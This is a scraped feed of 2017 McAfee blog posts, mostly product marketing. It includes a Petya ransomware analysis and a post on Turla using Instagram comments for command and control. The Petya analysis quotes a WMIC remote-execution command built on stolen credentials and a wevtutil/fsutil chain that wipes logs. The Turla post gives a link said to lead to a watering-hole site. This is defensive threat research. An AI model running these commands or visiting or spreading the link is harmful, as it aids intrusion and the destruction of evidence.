[1]Gartner Event Presentation, Magic Quadrant for Intrusion Detection and Prevention Systems, Craig Lawson, Gartner Security & Risk Management Summit, 12 –15 June 2017 / National Harbor, MD

The post Preventing the Next Petya: Block New Exploits by Defending Old Vulnerabilities appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/preventing-next-petya-block-new-exploits-defending-old-vulnerabilities/feed/ 0
The Machines Are Coming. And That’s a Good Thing. https://securingtomorrow.mcafee.com/business/machines-coming-thats-good-thing/ https://securingtomorrow.mcafee.com/business/machines-coming-thats-good-thing/#respond Thu, 13 Jul 2017 04:01:16 +0000 https://securingtomorrow.mcafee.com/?p=75950 This blog post was written by Raja Patel. There has been a lot of press articles recently with titles like “Robots are Coming for Your Job” and “Will Artificial Intelligence Be the Fall of Humankind?”, etc.  Most predictions of the future inevitably turn out to be wrong (or, as Yogi Berra said, “The future isn’t […]

The post The Machines Are Coming. And That’s a Good Thing. appeared first on McAfee Blogs.

]]>
This blog post was written by Raja Patel.

There has been a lot of press articles recently with titles like “Robots are Coming for Your Job” and “Will Artificial Intelligence Be the Fall of Humankind?”, etc.  Most predictions of the future inevitably turn out to be wrong (or, as Yogi Berra said, “The future isn’t what it used be.”).

Science fiction aside, there is one area where automated help is wanted and needed: cybersecurity. Cyber threats are coming fast and furious. So much so that these unwanted visitors could seriously impact the progress of the Digital Age. Do we need more people to combat this problem? Yes. Many more people are needed. So much so that a recent issue of a business publication named “Cybersecurity Expert” as one of nine “future proof” jobs.

But it’s not just a question of throwing more and more people at the problem. Or of software developers working overtime to perfect yet another standalone cybersecurity widget. The onslaught of malware and new permutations like ransomware simply evolve too fast. The industry needs help, and it will come from automation. McAfee recently commissioned research on the current state of machine intelligence as it relates to endpoint security: “Machine Learning Raises Security Teams to the Next Level”. I urge anyone who is seriously interested in cybersecurity to check it out. It makes clear that machine learning is needed, but is not a replacement for people – it’s an adjunct to the job people are already doing.

The Limits of Machine Learning

As much as we need machines, it’s important to remember what they can and cannot do:

Machine learning can: detect patterns hidden in the data at rapid speeds; increase this accuracy as more data feeds its algorithms; analyze results when a breach has occurred; and keep up with a large volume of routine attacks.

Machine learning cannot: initiate creative responses, understand the Big Picture; communicate threats across disparate organizations and systems; anticipate the threat arc of new human adversaries.

Machine learning is only as good as the algorithm it was “trained on.” Machine learning can’t exist without humans.

Machine learning makes security teams better. It means they are better informed and can make better decisions. As new threats are introduced, human security teams alone cannot sustain the volume, and machines alone cannot issue creative responses. Human-machine teams make cyber security more effective without draining performance or inhibiting the user experience.

ML + Endpoint

Machine learning allows endpoint security to continually evolve to stop new attack tactics. One of the challenges for IT operations is that endpoints are not sheltered in the datacenter, where they can be surrounded by layers of security defenses under the vigilance of security teams. Endpoints are constantly on the move, in and out of the network.

Thus, endpoint security is in a constant state of stepwise refinement, embracing new prevention techniques to stop new tactics. Machine learning is a natural extension to other malware-prevention methods and the constant back-and-forth conflict with hackers and attackers.

However, locating machine learning in the client alone is not the whole answer. There are those who believe that client-based solutions are the best way to stop malware before it starts running. Others claim ML should be based in the cloud, where the experiments of the bad guys can be analyzed.

McAfee does not subscribe exclusively to either — we think ML should cover both. In short, an integrated solution is the only way to be fully protected.

It’s also important to remember that machine learning is just one element of a successful Endpoint strategy.

Beyond Endpoint

Finally, though there is currently a lot of press and attention on ML at the endpoint, machine learning is not just for endpoint; it is a valuable tool that can be used across many aspects of cyber security. McAfee uses machine learning and other unsupervised learning algorithms across our portfolio, from Advanced Threat Defense (ATD) and Security Information and Event Management (SIEM) to URL Classification Systems and in the Gateway.

Conclusion

If a security analyst requires 15 minutes to investigate and clear a security alert, then that person can only process about 30 alerts per day. This formula dooms security teams into unsustainable reactionary patterns, and it fails to allow security personnel to develop problem-solving skills. Attackers use automated practices to discover what works and then relaunch tactics for maximum effect. The best way for security teams to get ahead in this game is to allocate time for people to use their intelligence and creativity to enhance security practices, and to leverage efficiencies gained from machine-learning technology to make that time.

Machine learning in cybersecurity is here, and that’s a good thing. It is a critical component of any enterprise endpoint security strategy. Given the volume and evolution of attacks hammering away at endpoints, security must be able to adapt without human intervention, and must provide the visibility and focus to enable humans to make more informed decisions. So, look at that “robot” as performing the routine stuff – and allowing the human to soar.

The post The Machines Are Coming. And That’s a Good Thing. appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/machines-coming-thats-good-thing/feed/ 0
Migrate to the New McAfee Endpoint Security (ENS) https://securingtomorrow.mcafee.com/business/endpoint-security/migrate-new-mcafee-endpoint-security-ens/ https://securingtomorrow.mcafee.com/business/endpoint-security/migrate-new-mcafee-endpoint-security-ens/#respond Thu, 06 Jul 2017 16:00:08 +0000 https://securingtomorrow.mcafee.com/?p=75561 The traditional IT model of waiting for early adopters to work through any bugs before you install new software makes sense in many cases. In cybersecurity, however, each day’s delay extends the window of opportunity for zero-day malware to wreak havoc on your endpoints. During the recent Wannacry ransomware attack, customers running the latest McAfee […]

The post Migrate to the New McAfee Endpoint Security (ENS) appeared first on McAfee Blogs.

]]>
The traditional IT model of waiting for early adopters to work through any bugs before you install new software makes sense in many cases. In cybersecurity, however, each day’s delay extends the window of opportunity for zero-day malware to wreak havoc on your endpoints.

During the recent Wannacry ransomware attack, customers running the latest McAfee Endpoint Security with Advanced Threat Protection never had a hiccup. Their endpoints immediately classified the file as greyware, subject to deeper analysis and containment. Like border collies so smart they don’t need a command, McAfee Dynamic Application Containment herded unknown files away from crucial areas, allowing them to run but not take actions that malware typically attempts— like encrypting files or overwriting directories.

All of this happened in seconds, without human intervention, and without waiting for a signature. While some organizations scrambled to contain a massive outbreak, McAfee Endpoint Security customers continued working as usual. Even if the attack made it onto an endpoint, it was severely limited in any damage it could cause to that endpoint or user. And with McAfee Threat Intelligence Exchange, the first endpoint to get hit communicated with every other system in the environment.

Stay Current, Stay Protected

Cases like this prove you can’t afford to wait. While signature-based security still plays an important role in endpoint security, it now functions best when used as part of a multi-layer defense, filtering out less sophisticated, “commodity” malware. Signature-based defenses depend on the endpoint security vendor identifying a new attack and creating a DAT file so endpoints can block it. Even when vendors discover a new threat immediately, it still takes hours or days to create and distribute that signature. And during that gap, thousands—even millions—of endpoints can get hit.

The more advanced modern malware threats, however, are designed to disguise their nature and exploit the windows of vulnerability that signature-only defenses leave open. That’s why the industry is moving to next-generation, signature-less approaches.

Move to the Latest McAfee Endpoint Security

With the latest McAfee Endpoint Security, you don’t have to wait for a signature. If an executable has never been seen before, your endpoints automatically classify it as “greyware” and treat it with appropriate suspicion. Your endpoints first conduct pre-execution scanning of its code base—essentially a static look at the code (before it runs). Then, they perform dynamic analysis of the behavior during execution. All of these capabilities, and others, are part of protection at each endpoint that limits the damage and spread of greyware to other endpoints. And they’re designed and integrated to close that window of vulnerability—to stop malware even before security systems know exactly what it is.

Learn More

No matter who your endpoint security vendor is, check to see if you’re running their latest software version—and if not, update it. Hint: If you’re running VirusScan Enterprise (VSE), McAfee Host IPS Firewall, or McAfee SiteAdvisor web filtering, you’re not using the latest McAfee Endpoint Security.

McAfee Endpoint Security is an integrated solution that replaces several individual legacy endpoint products, including McAfee VirusScan Enterprise, McAfee Host IPS Firewall, and McAfee SiteAdvisor web filtering. If you’re an existing customer with one of our Endpoint Security suites, McAfee Endpoint Security is a free security upgrade.

Learn more about migrating to the latest McAfee Endpoint Security

 

 

The post Migrate to the New McAfee Endpoint Security (ENS) appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/migrate-new-mcafee-endpoint-security-ens/feed/ 0
New Variant of Petya Ransomware Spreading Like Wildfire https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-variant-petya-ransomware-spreading-like-wildfire/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-variant-petya-ransomware-spreading-like-wildfire/#comments Tue, 27 Jun 2017 19:44:27 +0000 https://securingtomorrow.mcafee.com/?p=75464 The world woke up today to another ransomware outbreak wreaking havoc throughout companies’ networks. This time, the family causing the fuss is Ransomware Petya, a nasty variant that encrypts files and the computer’s master boot record (MBR), rendering the machine unusable.

The post New Variant of Petya Ransomware Spreading Like Wildfire appeared first on McAfee Blogs.

]]>
[This post was updated on June 27 at 18:40 Pacific time. The updated section is marked.] 

The world woke up today to another ransomware outbreak wreaking havoc throughout companies’ networks. This time, the family causing the fuss is Ransomware Petya, a nasty variant that encrypts files and the computer’s master boot record (MBR), rendering the machine unusable.

Ransomware Petya has been around since at least March 2016 and differs from usual ransomware families because it encrypts a system’s MBR in addition to encrypting files. This double stroke renders the disk inaccessible and prevents most users from recovering anything on it.

The new variant found today has further increased its nastiness by adding a spreading mechanism similar to what we saw in WannaCry just a few weeks ago. Petya comes as a Windows DLL with only one unnamed export, and uses the same EternalBlue exploit when it attempts to infect remote machines, as we can see below:

In the preceding image we can see the typical transaction occurring right before the exploit is sent—as we discussed in our WannaCry blog.

Once the exploit succeeds, the malware copies itself to the remote machine under C:\Windows, and starts itself using rundll32.exe. The process is executed under lsass.exe, the Windows process injected by the Eternal Blue exploit.

Because the WannaCry outbreak caused many people to apply all the latest Windows patches, Petya introduces a few more spreading mechanisms to be more successful. The next method Petya attempts is to copy itself and a copy of psexec.exe to the remote machine’s ADMIN$ folder. If it is successful, the malware attempts to start psexec.exe using a remote call to run it as a service, as we can see below:

The preceding image first shows the DLL being copied to the remote host. And the following image shows psexec being copied and then attempting to start it using the svcctl remote procedure call.

Both files are copied to the C:\Windows folder.

One last method attempted by the malware is to use the Windows Management Instrumentation Command-line (WMIC) to execute the sample directly on the remote machine, using stolen credentials. The command used by the malware looks like this:

  • exe %s /node:”%ws” /user:”%ws” /password:”%ws” process call create “C:\Windows\System32\rundll32.exe \”C:\Windows\%s\” #1

where “%ws” is a variable representing a wide string, which will be generated based on the current machine and credential being exploited.

Once the malware runs on the machine, it will drop psexec.exe to the local system as c:\windows\dllhost.dat, and another .EXE (either 32- or 64-bit version depending on the operating system) to the %TEMP% folder. This binary is a modified version of a password dump tool, similar to Mimikatz or LSADump.

The preceding code shows the LSA functions used during password extraction.

This .EXE accepts as parameter a PIPE name similar to the following:

  • \\.\pipe\{df458642-df8b-4131-b02d-32064a2f4c19}

This pipe is used by the malware to receive the stolen passwords, which are then used by the WMIC shown above.

All these files are present in the resource section of the main DLL in a compressed form, as follows:

The malware then encrypts local files and the MBR, and installs a scheduled task to reboot the machine after one hour using schtasks.exe, as seen below:

The encryption used by the malware is AES-128 with RSA. This is different from previous variants, which used SALSA20. The RSA public key used to encrypt the file encryption keys is hardcoded and can be seen below:

The malware also attempts to clear Event logs to hide its traces, by executing the following commands:

  • wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:

After the machine is rebooted, the ransom message appears and demands US$300 in Bitcoins:

At this moment there are few transactions to this account, but this could change quickly once more people start to notice they are infected:

We will update this blog as more information arrives. Systems protected with McAfee ENS 10.5 and McAfee Total Protection should be protected from known samples if their products are up to date and connected to McAfee Global Threat Intelligence. McAfee Adaptive Threat Protection, which integrates machine learning and containment capacities, detects both the main DLL as well as the dropped EXE, as seen below:

Detection for the main DLL is shown above, and for the sample dropped in %TEMP% is shown below:

Update (June 27)

After further analysis of the current samples, we have learned more about this threat:

  • This map shows the current distribution of clients that have detected known samples, with darker colors representing a greater number of detections:

  • The following diagram shows the flow of events after the initial infection: 
  • Reports on social media claim there is a kill switch in the malware that can be activated by creating a specific file under C:\Windows. Although we do see code to check for the existence of the file, we cannot confirm that this filename is fixed.We have observed in our replication that the filename checked at the target machine must be the same filename used in the source machine. Thus it is not possible to predict what this filename must be before the infection occurs, and we cannot confirm that this is a possible kill switch.
  • The ransomware component affects far fewer file extensions than is common. The list of extensions that will be encrypted by the malware:

  • The four resources present in the resource section follow. They are simply compressed by ZLib and extracted during the malware initialization:
    • exe digitally signed by Microsoft.
    • 32-bit .exe with the password-stealing component.
    • 64-bit .exe with the password-stealing component.
    • Shellcode with a modified version of the Eternal Blue exploit.
  • Once a machine is infected, the sample attempts to spread to other machines on the network. Unlike WannaCry, which attempted to infect all IP addresses on the network, Petya’s approach is more precise and generates much less traffic over the network. Upon execution, the sample will check if the current machine is a workstation or a domain controller.

If the machine is identified as a domain controller, the malware will query its DHCP Service to retrieve a list of machines that were served with IP addresses within all subnets defined on the DHCP server.

Every client IP address retrieved with this technique is attacked with the EternalBlue exploit to spread the malware to other machines on the network.

  • The malware has not yet been found to use any document or social engineering technique as a propagation mechanism.
  • The main DLL component accepts a parameter for its export. This parameter is the time it will wait before rebooting the machine. By default, when the malware infects a remote system, it runs the remote DLL with the value “40,” which makes it wait 40 minutes before rebooting the machine, as shown below:
    • Rundll32 c:\windows\<dll name>.dll,#1 40
  • The malware uses AES-128 encryption to generate the key to encrypt the files. This variant uses a single key to encrypt all files, which differs from some other malware families. This key is generated once during the initialization of the malware.
  • As we saw with WannaCry network traffic, this malware also sends at some point a hardcoded IP address as part of the ConnectX request in the NETBIOS sessions. The IP address in the NETBIOS packet is highlighted below and can be used to detect malicious traffic on the network:

[End update]

Indicators of compromise

Known hashes

  • 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745 (main 32-bit DLL)
  • 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1 (main 32-bit DLL)
  • f8dbabdfa03068130c277ce49c60e35c029ff29d9e3c74c362521f3fb02670d5 (signed PSEXEC.EXE)
  • 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f (64-bit EXE)
  • eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998 (32-bit EXE)

Files

  • c:\windows\dllhost.dat
  • c:\windows\<malware_dll> (no extension)
  • %TEMP%\<random name>.tmp (EXE drop)

Other indicators

  • PIPE name: \\.\pipe\{df458642-df8b-4131-b02d-32064a2f4c19}
  • Scheduled task running “shutdown -r -n”

Detection

  • McAfee products detect this threat as Ransom-Petya with coverage from DAT Version 8574 (ENS DAT Version 3175).
  • McAfee detects this threat with Global Threat Intelligence File Reputation (with a Low setting). 
  • McAfee Network Security Platform detects Petya ransomware:
    • 0x43c0bd00- NETBIOS-SS: MS17-010 SMB Remote Code Execution (Eternal Tools and WannaCry Ransomware)
    • 0x451e3300- HTTP: Microsoft Office OLE Arbitrary Code Execution Vulnerability (CVE-2017-0199)

For the latest information on McAfee product protection against this attack, read this Knowledge Center article. For more on how McAfee products can help defend against this attack, see “How to Protect Against Petya Ransomware in a McAfee Environment.”

The post New Variant of Petya Ransomware Spreading Like Wildfire appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-variant-petya-ransomware-spreading-like-wildfire/feed/ 4
Can you see me now? Unpacking malware for advanced threat analysis. https://securingtomorrow.mcafee.com/business/security-operations/can-see-now-unpacking-malware-advanced-threat-analysis/ https://securingtomorrow.mcafee.com/business/security-operations/can-see-now-unpacking-malware-advanced-threat-analysis/#respond Thu, 22 Jun 2017 16:00:24 +0000 https://securingtomorrow.mcafee.com/?p=75343 This blog was written by Stan Golubchik. A recent McAfee blog ‘Malware Packers Use Tricks to Avoid Analysis, Detection’, highlighted the use of packers as an effective way to slow down analysis and decrease detection by antimalware products. As an engineer with a keen interest in malware, I’m very familiar with packers and the conclusion […]

The post Can you see me now? Unpacking malware for advanced threat analysis. appeared first on McAfee Blogs.

]]>
This blog was written by Stan Golubchik.

A recent McAfee blog ‘Malware Packers Use Tricks to Avoid Analysis, Detection’, highlighted the use of packers as an effective way to slow down analysis and decrease detection by antimalware products.

As an engineer with a keen interest in malware, I’m very familiar with packers and the conclusion from that blog that ‘manual analysis usually defeats .’ Manual analysis can take time. Something that seems to be in short supply as of late.  I’ve found a McAfee product – McAfee Advanced Threat Defense (ATD)- that takes care of the packing problem for me, saving lots time and a few headaches too.

Let me explain: First, what’s a packer?

A packer, is a tool that can be utilized to compress, encrypt, or modify the format of a file. By packing a file, malware authors can obfuscate the content and disrupt analysis by threat detection tools. This technique may also be referred as “executable compression.” Compression of the file reduces the footprint or size of the file and can be an effective method to avoid or reduce the chance of the malicious file being detected, allowing for successful delivery of a payload. While an effective method, forcing the re-execution of code through a memory dump provides a solution to detect even the most advanced threats. So how is this accomplished? McAfee ATD provides an answer to detecting the most advanced and obfuscated code in packed or unpacked files.

When a packed sample arrives at McAfee ATD for analysis, the sample is loaded into memory and the packer associated with the sample unpacks the code, de-obfuscating the code during execution. At this point, several advanced detection engines are engaged, including dynamic analysis (observation of execution) and static code analysis (where the code – not just the behavior it exhibited in the sandbox – is scrutinized for any malicious behavior). After the sample has finished execution, McAfee ATD assesses the memory dump and maps the code. As sections of code are analyzed, family classification is performed on the buffered code based on known malicious behavior. Once the assessment of behavioral characteristics of the code is completed, a determination on whether the file is clean or malicious yields a reputation verdict. Quick. Easy. Done.

As mentioned in the previous blog, a rather effective method for defeating a packer is to manually analyze the file. McAfee ATD can help with that as well.  McAfee ATD offers manual analysis capabilities with its interactive mode, or X-Mode. Manually uploading a file to a McAfee  ATD appliance and enabling the X-Mode feature will allow users to choose their specified analysis environment or virtual machine (VM) to initiate the execution of a file. As the file is uploaded through this route, a user may open a window to the active VM denotating the file to observe and interact with the malware. This provides a deep investigative and forensic capability for a malware analyst to understand the behavior of the executed code.

A packer can prove to be an effective way to reduce the speed of analysis and even avoid it all together. With packed files that could typically fly under the radar undetected by traditional sandbox solutions, McAfee ATD provides ways to overcome this advanced method of detection avoidance from malware authors.

The post Can you see me now? Unpacking malware for advanced threat analysis. appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/can-see-now-unpacking-malware-advanced-threat-analysis/feed/ 0
Migration to McAfee Endpoint Security “Like Moving from a VW Bug to an Aston Martin” https://securingtomorrow.mcafee.com/business/migration-mcafee-endpoint-security-like-moving-vw-bug-aston-martin/ https://securingtomorrow.mcafee.com/business/migration-mcafee-endpoint-security-like-moving-vw-bug-aston-martin/#respond Thu, 22 Jun 2017 14:00:01 +0000 https://securingtomorrow.mcafee.com/?p=74938 Norbert Marx, a senior security engineer at Accarda, a Swiss provider of customer loyalty cards and other payment-related services, has become an evangelist of sorts for McAfee Endpoint Security (ENS) ever since his company migrated to it. “What are you waiting for?” says Marx. “McAfee ENS protects better, is easier to use, and saves time. […]

The post Migration to McAfee Endpoint Security “Like Moving from a VW Bug to an Aston Martin” appeared first on McAfee Blogs.

]]>
Norbert Marx, a senior security engineer at Accarda, a Swiss provider of customer loyalty cards and other payment-related services, has become an evangelist of sorts for McAfee Endpoint Security (ENS) ever since his company migrated to it.

“What are you waiting for?” says Marx. “McAfee ENS protects better, is easier to use, and saves time. It is better in every way than its predecessor. It’s like two different worlds. It’s like moving from a Volkswagen bug to an Aston Martin.”

Marx is the chief person responsible for technical security decisions and troubleshooting. What he loves best about McAfee ENS is how it simplifies his job and others.  Since the company runs a lean business—it serves more than two million end customers but has just 220 employees—and has a very small security staff, ease of administration is critical.

“With our limited information security staff, a security tool must be easy to use or we won’t even consider it,” claims Marx. “It also has to do what it is supposed to do. We simply don’t have time to deal with extremely complicated systems or firefighting.”

With McAfee ENS, Accarda saves time when pushing out updates or troubleshooting. That’s because Previously the anti-virus engine, host intrusion prevention, and web control were all separate agents on each endpoint. By migrating to ENS, however, the company consolidated all those aspects of endpoint protection into a single agent.

The improved graphical user interface of McAfee ENS also facilitates endpoint security management. According to Marx, the ENS interface within McAfee ePO is notably easier to use, with very helpful and understandable graphical displays and alerts. In addition, it provides more insights into the origins, attempted actions, and targets of attacks to help with decision making and hardening of policies and defensive actions.

“What are you waiting for? McAfee ENS protects better, is easier to use, and saves time. It is better in every wya than its predecessor. It’s like two different worlds. It’s like moving from a Volkswagen bug to an Aston Martin.”

-Norbert Marx, Senior Security Engineer, Accarda

Furthermore, superior endpoint protection with McAfee ENS equates to fewer security incidents and therefore less time spent remediating. “With the added reputation and behavior-based capabilities of ENS, we can identify malware and zero-day threats more quickly and effectively,” says Marx, “and with DAC [Dynamic Application Containment], we can contain them before they can cause harm.”

Accarda’s overall security posture is also bolstered by the integration of McAfee ENS with the McAfee Data Exchange Layer (DXL) and McAfee Threat Intelligence Exchange, which combines multiple internal and external threat information sources and instantly shares this data with all the company’s DXL-connected security solutions, including McAfee Web Gateway and the McAfee SIEM.

“For instance, if an application is violating our security policy or causes suspicious activity that is detected by McAfee ENS, we can immediately tag the file as potentially malicious, thus preventing its execution anywhere in the enterprise,” explains Marx. “And with the relevant data now contained in the Threat Intelligence Exchange database, if anyone else attempts to go to that website, Web Gateway won’t allow it.”

In addition, Accarda continues to benefit from the ease of use of McAfee ePolicy Orchestrator®, (ePO™), the central management console that enables management of multiple McAfee solutions from one screen. (McAfee ePO was one of the main reasons that Accarda chose its legacy endpoint solution, the McAfee Endpoint Threat Protection suite.) At Accarda, each of the four or five people who use McAfee ePO regularly has his own dashboard for instant viewing of the information most important to him. For instance, one dashboard is strictly used by IT operations, another by the person who oversees PCs, another by a server administrator, and another by Marx for an overall view of security and troubleshooting. “Without McAfee ePO, my job would be many times more difficult,” claims Marx.

Using the McAfee migration tool inside McAfee ePO, Accarda migrated all the company’s endpoints in just one day from the McAfee VirusScan Enterprise anti-virus engine and McAfee SiteAdvisor agents in its McAfee Enterprise Threat Protection suite to McAfee ENS. An early adopter, Accarda began with ENS version 10.1 and as new versions of ENS have been released, Accarda has upgraded to them. Marx notes that each version has offered improvements over previous versions and that ENS version 10.5 is the best yet.

So what are you waiting for?

 

To read the full case study on the Accarda, click here. Get your questions answered by tweeting @McAfee_Business.

The post Migration to McAfee Endpoint Security “Like Moving from a VW Bug to an Aston Martin” appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/migration-mcafee-endpoint-security-like-moving-vw-bug-aston-martin/feed/ 0
‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-malware-evasion-techniques-digital-steganography-password-stealer-fareit/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-malware-evasion-techniques-digital-steganography-password-stealer-fareit/#respond Tue, 20 Jun 2017 04:01:23 +0000 https://securingtomorrow.mcafee.com/?p=75224 This blog post was written by Vincent Weafer. We got a little carried away in the McAfee Labs Threats Report: June 2017, published today. This quarter’s report has expanded to a rather hefty 83 pages! It contains three highly educational topics, in addition to the usual set of threats statistics: We broadly examine evasion techniques […]

The post ‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit appeared first on McAfee Blogs.

]]>
This blog post was written by Vincent Weafer.

We got a little carried away in the McAfee Labs Threats Report: June 2017, published today. This quarter’s report has expanded to a rather hefty 83 pages! It contains three highly educational topics, in addition to the usual set of threats statistics:

  • We broadly examine evasion techniques and how malware authors use them to accomplish their goals. We discuss the more than 30-year history of evasion by malware, the underground market for off-the-shelf evasion technology, how several contemporary malware families leverage evasion techniques, and what to expect in the future, including machine-learning and hardware-based evasion.
  • We explore the very interesting topic of steganography in the digital world. Digital steganography hides information in benign-looking objects such as images, audio tracks, video clips, or text files. Of course, attackers use these techniques to move information past security systems. We explain how that happens in this key topic.
  • We deconstruct Fareit, the most famous password-stealing malware. We cover its origins, typical infection vectors, architecture and inner workings, how it has changed over the years, and how it was likely used in the breach of the Democratic National Committee before the 2016 U.S. Presidential election. Coincidentally, DocuSign reported that on May 15, customer email addresses were stolen and then used in a phishing campaign. Victims who clicked on the phishing links were infected with malware, one of which was Fareit. Read our technical analysis of the DocuSign attack.

Accompanying each of these key topics is a Solution Brief that goes into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q1:

  • Malware: New malware samples rebounded in Q1 to 32 million. The total number of malware samples increased 22% in the past four quarters to 670 million samples.
  • Ransomware: New ransomware samples rebounded in Q1 primarily due to Congur ransomware attacks on Android OS devices. The number of total ransomware samples grew 59% in the past four quarters to 9.6 million samples. (We will discuss the WannaCry ransomware in our next quarterly report.)
  • Mobile malware: Reports from Asia doubled in Q1, contributing to a 57% increase in global infection rates. Total mobile malware grew 79% in the past four quarters to 16.7 million samples.
  • Incidents: We counted 301 publicly disclosed security incidents in Q1, an increase of 53% over Q4. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q1 took place in the Americas.

Read the McAfee Labs Threats Report: June 2017.

The post ‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-malware-evasion-techniques-digital-steganography-password-stealer-fareit/feed/ 0
How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server https://securingtomorrow.mcafee.com/business/hacking-group-used-britney-spears-instagram-operate-command-control-server/ https://securingtomorrow.mcafee.com/business/hacking-group-used-britney-spears-instagram-operate-command-control-server/#respond Mon, 19 Jun 2017 16:01:28 +0000 https://securingtomorrow.mcafee.com/?p=75268 A nasty piece of malware is currently being tested by a Russian hacking group named Turla, and its trial round has been conducted in an unexpected area of the internet — the comments section of Britney Spears’ Instagram. As a matter of fact, they’re using her Instagram as a way to contact the malware’s command […]

The post How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server appeared first on McAfee Blogs.

]]>
A nasty piece of malware is currently being tested by a Russian hacking group named Turla, and its trial round has been conducted in an unexpected area of the internet — the comments section of Britney Spears’ Instagram. As a matter of fact, they’re using her Instagram as a way to contact the malware’s command and control (C&C) server.

So how does Turla make this happen, exactly? Leveraging a recently discovered backdoor found in a fake Firefox extension, the cybercriminals instruct the malware to scroll through the comments on Spears’ photos and search for one that has a specific hash value. When the malware finds the comment it was told to look for, it converts it into this Bitly link: http://bit.ly/2kdhuHX. The shortened link resolves to a site that’s known to be a Turla watering hole.

This way, in the chance their attack becomes compromised, the cybercriminals can ensure their C&C can be changed without having to change the malware. If the attackers want to create a new meetup location, all they have to do is delete the first infected comment, and infiltrate a new one with same hash value.

This infected comment on Spears’ post doesn’t look exactly normal, but most people probably would think it’s just spam — unless they clicked it. If someone does in fact click on the link, they’ll be directed to the hacker group’s forum, which is where they actually infect innocent users. For this Trojan in particular, visitors who click will get taken to a site and asked to install the extension with the benign name “HTML5 Encoder.”

The good news is — this is, after all, just a test. Plus, Firefox is said to be already working on a fix so that the extension being used won’t work anymore.

For more information on this attack and others like it, follow @McAfee and @McAfee_Business.

The post How a Hacking Group Used Britney Spears’ Instagram to Operate a Command and Control Server appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/hacking-group-used-britney-spears-instagram-operate-command-control-server/feed/ 0
McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace https://securingtomorrow.mcafee.com/business/mcafee-public-cloud-server-security-suite-paid-ami-now-aws-marketplace/ https://securingtomorrow.mcafee.com/business/mcafee-public-cloud-server-security-suite-paid-ami-now-aws-marketplace/#respond Thu, 15 Jun 2017 16:00:06 +0000 https://securingtomorrow.mcafee.com/?p=74449 This blog post was written by Teresa Wingfield. A new Paid Amazon Machine Image (AMI) for McAfee Public Cloud Server Security Suite (McAfee PCS) is now available on an hourly basis on the Amazon Web Services (AWS) Marketplace. The Paid AMI is a flexible option for protecting AWS workloads since there’s no need to estimate […]

The post McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace appeared first on McAfee Blogs.

]]>
This blog post was written by Teresa Wingfield.

A new Paid Amazon Machine Image (AMI) for McAfee Public Cloud Server Security Suite (McAfee PCS) is now available on an hourly basis on the Amazon Web Services (AWS) Marketplace. The Paid AMI is a flexible option for protecting AWS workloads since there’s no need to estimate usage and obtain a license before getting started.  You may want to explore McAfee PCS (Paid AMI) for AWS security if you:

  • Prefer an OpEx “pay-as-you-go” pricing model
  • Have spiky (variable) sizing and timing requirements for your workloads that are difficult to estimate
  • Want to test drive McAfee PCS before purchasing a license from McAfee.

With AWS, you are participating in a shared responsibility security model where AWS is responsible for securing underlying infrastructure and you are responsible for securing your workloads and configuring platform security. McAfee PCS provides visibility and protection to keep AWS deployments safe. Comprehensive protection starts at just $0.1 per hour.

Our new McAfee PCS PAID AMI is designed to help enterprise and government AWS customers quickly secure their Amazon workloads with foundational security consisting of:

  • Cloud workload discovery and monitoring
  • Antimalware
  • Host-based firewall
  • Host intrusion prevention.

White listing, file integrity monitoring and change prevention are also available to help protect high-risk environments and meet regulatory compliance. McAfee PCS protection scales elastically with your Amazon workloads for continuous protection.

 

Cloud Workload Discovery provides end-to-end visibility into all cloud workloads

What do I get from using McAfee PCS to protect AWS workloads?  

  • Faster threat detection (as shown in the screen shot above) through insights into weak security controls for cloud workloads, unsafe firewall settings, unencrypted volumes and indicators of compromise such as suspicious traffic
  • Quick and easy remediation using McAfee ePolicy Orchestrator or your favorite DevOps tools such as Amazon OpsWorks, Chef, or Puppet
  • Defense against emerging and advanced threats with malware scanning and intrusion prevention
  • Protection from advanced persistent threats without requiring signature updates or labor-intensive list management
  • Prevention of change activity that can lead to security breaches, data loss, and outages
  • Easier achievement and demonstration of regulatory compliance

Get Started

Start at no cost with a free trial! Click here to visit the AWS Marketplace.

 

 

The post McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-public-cloud-server-security-suite-paid-ami-now-aws-marketplace/feed/ 0
